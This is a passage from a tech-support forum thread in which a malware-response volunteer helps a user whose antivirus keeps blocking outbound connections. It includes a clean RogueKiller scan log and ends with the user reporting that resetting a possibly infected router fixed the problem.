This could be the culprit.

The KMPlayer has been found to be bundled with 3rd party software. If you have not purposefully installed this, you should be safe uninstalling it.

http://www.shouldiremoveit.com/The-KMPlayer-7011-program.aspx

Are the popups on all your browsers of just one of them.

p.s.
You can remove it via the Control Panel > Programs and Features applet.
The KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 3.8.0.121 - PandoraTV)

Keep me posted.

#11 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 13 December 2015 - 09:20 AM

Hello nasdaq,

 

I have been using KMPlayer for nearly 3 years. I uninstalled it anyway but it didn't solve the problem. Just to clear something, the popups are not on the browser. The popups I get are from the antivirus software. I get them from Malwarebytes and Kaspersky. I attached the images of the popups on the first post, I will post more detailed screenshots of the issue on this post. When I browse on the internet it blocks some connections by the browser, when I try to play a game it blocks some connections by Steam, when the computer is idle and no active programs are running it blocks some connections by svchost.exe. You can view the attached screenshots and get a more detailed look at it.

 

Best,

 

Arda

Attached Files



#12 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 13 December 2015 - 01:45 PM


Please run this tool and post the log.

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or Windows 7, right-click and select "Run as Administrator to start"
  • For Windows XP, double-click to start.
  • Wait until Prescan has finished ...
  • When instructed Click on "Scan" button
  • Wait until the Status box shows "Scan Finished"
  • Click on "Report"
  • Click on Export TXT button save the file as RogueReport.txt
  • The file RogueReport.txt will be saved in the desktop.
  • Close the program.
  • Open the file with Notepad and Copy/paste the content into your next reply.
<<<>>>

#13 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 13 December 2015 - 03:11 PM

Hello nasdaq,

 

I think you forgot we tried that yesterday. You can check post#7 and post #9 on this topic for recap. As I said in post #9, after the deletion of the threats I ran it again and it didn't find any more threats. I redid now just to follow your instructions again but it is no big surprise that the result is the same, no threats. You can check the log below if you want but I don't think there is a lot to check.

 

RogueKiller V11.0.2.0 [Dec  7 2015] (Free) by Adlice Software
 
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Arda [Administrator]
Started from : C:\Users\Arda\Desktop\RogueKiller.exe
Mode : Scan -- Date : 12/13/2015 22:05:32
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 0 ¤¤¤
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] 7469b54249d2406ac14f7d7c22138d9d
[BSP] 73c3af7b8366531e03277fe14d3640cb : Linux|VT.Unknown MBR Code
Partition table:
0 - EF | Offset (sectors): 2048 | Size: 200 MB
1 - Mi | Offset (sectors): 411648 | Size: 128 MB
2 -  | Offset (sectors): 673792 | Size: 839700 MB
3 -  | Offset (sectors): 1817037824 | Size: 41043 MB
4 - [SYSTEM] Ba | Offset (sectors): 1901094912 | Size: 25600 MB
5 -  | Offset (sectors): 1720381440 | Size: 1 MB
6 -  | Offset (sectors): 1720383488 | Size: 39043 MB
7 -  | Offset (sectors): 1800343552 | Size: 8151 MB
User = LL1 ... OK
User = LL2 ... OK


#14 nasdaq

nasdaq

  • Malware Response Team
  • 38,594 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:24 AM

Posted 14 December 2015 - 08:53 AM

Sorry about that double post.

Reset your router. It may be infected.

How to Reset a Router Back to the Factory Default Settings
http://www.ehow.com/how_2110924_reset-back-factory-default-settings.html

Then, please reconfigure it back to your preferred setting.. Below is the list of default username and password, should you don't know it ;)

http://www.routerpasswords.com/
http://www.phenoelit-us.org/dpl/dpl.html
===

Reset for Linksys, Netgear, D-Link and Belkin Routers
http://www.techsupportforum.com/2763-reset-for-linksys-netgear-d-link-and-belkin-routers/

====
How to tell if my Wireless is secure.
http://www.ehow.com/how_6775466_tell-wireless-secure_.html

#15 itucs

itucs
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:11:24 AM

Posted 14 December 2015 - 10:39 AM

Hello nasdaq,
 
That was a lifesaver. It solved the problem instantly. I haven't been able to connect to my default gateway for a while to change my router settings and I thought that this was a problem caused by the trojan, not the other way around obviously. I didn't know that a router may be infected at all.
 
I have spent so many hours trying to fix this and could have spent many more before I even consider doing what you suggested. I hope it won't come back and I won't have to post here again. Thank you for all your support and valuable advice. I really appreciate it.
 
Best regards,
 
Arda





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users